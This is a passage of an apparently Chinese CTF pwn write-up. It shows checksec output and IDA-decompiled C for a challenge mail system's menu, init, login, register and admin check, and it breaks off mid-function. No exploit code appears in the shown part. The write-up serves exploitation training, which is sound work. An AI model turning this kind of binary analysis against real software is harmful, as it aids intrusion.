class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">[*] &#39;/home/kali/Desktop/attachment/pwn&#39; </span></span><span class="line"><span class="cl"> Arch: amd64-64-little </span></span><span class="line"><span class="cl"> RELRO: Full RELRO </span></span><span class="line"><span class="cl"> Stack: Canary found </span></span><span class="line"><span class="cl"> NX: NX enabled </span></span><span class="line"><span class="cl"> PIE: PIE enabled </span></span><span class="line"><span class="cl"> SHSTK: Enabled </span></span><span class="line"><span class="cl"> IBT: Enabled </span></span></code></pre></td></tr></table> </div> </div><p>保护全开</p> <h3 id="ida">IDA </h3><p>程序比较复杂,需要耐心分析,是一个简单的邮件系统</p> <h4 id="main">main </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">void</span> <span class="kr">__fastcall</span> <span class="n">__noreturn</span> <span class="nf">main</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">a1</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">a2</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">a3</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">v3</span><span class="p">;</span> <span class="c1">// [rsp+4h] [rbp-Ch] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v4</span><span class="p">;</span> <span class="c1">// [rsp+8h] [rbp-8h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">v4</span> <span class="o">=</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">init</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">menu</span><span class="p">(</span><span class="n">a1</span><span class="p">,</span> <span class="n">a2</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">v3</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">a2</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">**</span><span class="p">)</span><span class="o">&amp;</span><span class="n">v3</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">a1</span> <span class="o">=</span> <span class="s">&#34;%d&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="nf">__isoc99_scanf</span><span class="p">(</span><span class="s">&#34;%d&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">v3</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span> <span class="nf">getchar</span><span class="p">()</span> <span class="o">!=</span> <span class="mi">10</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">a1</span> <span class="o">=</span> <span class="s">&#34;Invalid input!&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Invalid input!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v3</span> <span class="o">==</span> <span class="mi">3</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Goodbye!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v3</span> <span class="o">&gt;</span> <span class="mi">3</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"><span class="nl">LABEL_13</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">a1</span> <span class="o">=</span> <span class="s">&#34;Invalid choice!&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Invalid choice!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span> <span class="n">v3</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">login</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v3</span> <span class="o">!=</span> <span class="mi">2</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">goto</span> <span class="n">LABEL_13</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">register</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><h4 id="menu">menu </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">menu</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Welcome to the mail system!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;1. login account&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;2. register account&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;3. exit&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Your choice: &#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>能注册和登录,可以正常退出</p> <h4 id="init">init </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">init</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="o">*</span><span class="n">v0</span><span class="p">;</span> <span class="c1">// rax </span></span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">i</span><span class="p">;</span> <span class="c1">// [rsp+4h] [rbp-Ch] </span></span></span><span class="line"><span class="cl"> <span class="n">FILE</span> <span class="o">*</span><span class="n">stream</span><span class="p">;</span> <span class="c1">// [rsp+8h] [rbp-8h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nf">setvbuf</span><span class="p">(</span><span class="n">stdin</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">setvbuf</span><span class="p">(</span><span class="n">stdout</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">setvbuf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">seccomp</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;=</span> <span class="mi">11</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">this_is_time</span><span class="p">[</span><span class="mi">34</span> <span class="o">*</span> <span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="nf">time</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">this_is_admin</span> <span class="o">=</span> <span class="nf">malloc</span><span class="p">(</span><span class="mh">0x400u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">memset</span><span class="p">(</span><span class="n">this_is_admin</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mh">0x400u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">this_is_admin</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;malloc error&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="n">v0</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">this_is_admin</span> <span class="o">+</span> <span class="mi">50</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)((</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">this_is_admin</span> <span class="o">+</span> <span class="mi">50</span><span class="p">)</span> <span class="o">=</span> <span class="err">&#39;</span><span class="n">imda</span><span class="err">&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">((</span><span class="n">_WORD</span> <span class="o">*</span><span class="p">)</span><span class="n">v0</span> <span class="o">+</span> <span class="mi">2</span><span class="p">)</span> <span class="o">=</span> <span class="sc">&#39;n&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">stream</span> <span class="o">=</span> <span class="nf">fopen</span><span class="p">(</span><span class="s">&#34;/dev/urandom&#34;</span><span class="p">,</span> <span class="s">&#34;rb&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">stream</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;fopen error&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="nf">fread</span><span class="p">((</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">this_is_admin</span> <span class="o">+</span> <span class="mh">0x68</span><span class="p">,</span> <span class="mi">1u</span><span class="p">,</span> <span class="mh">0x10u</span><span class="p">,</span> <span class="n">stream</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="nf">fclose</span><span class="p">(</span><span class="n">stream</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>初始化管理员账号,管理员密码随机</p> <h4 id="login">login </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="nf">login</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">i</span><span class="p">;</span> <span class="c1">// [rsp+Ch] [rbp-64h] </span></span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="o">*</span><span class="n">v2</span><span class="p">;</span> <span class="c1">// [rsp+18h] [rbp-58h] </span></span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">s2</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span> <span class="c1">// [rsp+20h] [rbp-50h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">v4</span><span class="p">[</span><span class="mi">40</span><span class="p">];</span> <span class="c1">// [rsp+40h] [rbp-30h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v5</span><span class="p">;</span> <span class="c1">// [rsp+68h] [rbp-8h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">v5</span> <span class="o">=</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Input your name: &#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">__isoc99_scanf</span><span class="p">(</span><span class="s">&#34;%31s&#34;</span><span class="p">,</span> <span class="n">s2</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Input your password: &#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">__isoc99_scanf</span><span class="p">(</span><span class="s">&#34;%31s&#34;</span><span class="p">,</span> <span class="n">v4</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="nf">admin_check</span><span class="p">(</span><span class="n">s2</span><span class="p">,</span> <span class="n">v4</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">admin_panel</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;=</span> <span class="mi">11</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">user_table</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">v2</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)(</span><span class="n">user_table</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">+</span> <span class="mi">704LL</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="nf">strcmp</span><span class="p">((</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="p">)(</span><span class="n">user_table</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">+</span> <span class="mi">664LL</span><span class="p">),</span> <span class="n">s2</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">v2</span><span class="p">,</span> <span class="n">v4</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Welcome back, %s!</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">s2</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">putchar</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">mail_panel</span><span class="p">(</span><span class="n">user_table</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">v5</span> <span class="o">-</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Login failed! Invalid username or password.&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">putchar</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">v5</span> <span class="o">-</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>登录逻辑</p> <h4 id="register">register </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="nf">register</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">v1</span><span class="p">;</span> <span class="c1">// [rsp+Ch] [rbp-54h] </span></span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">s1</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span> <span class="c1">// [rsp+10h] [rbp-50h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">src</span><span class="p">[</span><span class="mi">40</span><span class="p">];</span> <span class="c1">// [rsp+30h] [rbp-30h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v4</span><span class="p">;</span> <span class="c1">// [rsp+58h] [rbp-8h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">v4</span> <span class="o">=</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">v1</span> <span class="o">=</span> <span class="nf">add_user</span><span class="p">((</span><span class="kr">__int64</span><span class="p">)</span><span class="n">user_table</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v1</span> <span class="o">!=</span> <span class="o">-</span><span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Input your name: &#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">__isoc99_scanf</span><span class="p">(</span><span class="s">&#34;%31s&#34;</span><span class="p">,</span> <span class="n">s1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">s1</span><span class="p">,</span> <span class="s">&#34;admin&#34;</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Username illegal!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">putchar</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">free</span><span class="p">((</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">user_table</span><span class="p">[</span><span class="n">v1</span><span class="p">]);</span> </span></span><span class="line"><span class="cl"> <span class="n">user_table</span><span class="p">[</span><span class="n">v1</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">strcpy</span><span class="p">((</span><span class="kt">char</span> <span class="o">*</span><span class="p">)(</span><span class="n">user_table</span><span class="p">[</span><span class="n">v1</span><span class="p">]</span> <span class="o">+</span> <span class="mh">0x298LL</span><span class="p">),</span> <span class="n">s1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Input your password: &#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">__isoc99_scanf</span><span class="p">(</span><span class="s">&#34;%31s&#34;</span><span class="p">,</span> <span class="n">src</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">strcpy</span><span class="p">((</span><span class="kt">char</span> <span class="o">*</span><span class="p">)(</span><span class="n">user_table</span><span class="p">[</span><span class="n">v1</span><span class="p">]</span> <span class="o">+</span> <span class="mh">0x2C0LL</span><span class="p">),</span> <span class="n">src</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Registered user: %s</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">s1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Registration successful!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">putchar</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">v4</span> <span class="o">-</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>注册逻辑</p> <h4 id="admin_check">admin_check </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kr">__int64</span> <span class="kr">__fastcall</span> <span class="nf">admin_check</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">a1</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">a2</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="nf">strcmp</span><span class="p">(</span><span class="n">a1</span><span class="p">,</span> <span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">this_is_admin</span> <span class="o">+</span> <span class="mh">0x32</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="nf">strncmp</span><span class="p">(</span><span class="n">a2</span><span class="p">,</span> <span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">this_is_admin</span> <span class="o">+</span> <span class="mh">0x68</span><span class="p">,</span> <span class="mh">0x10u</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span 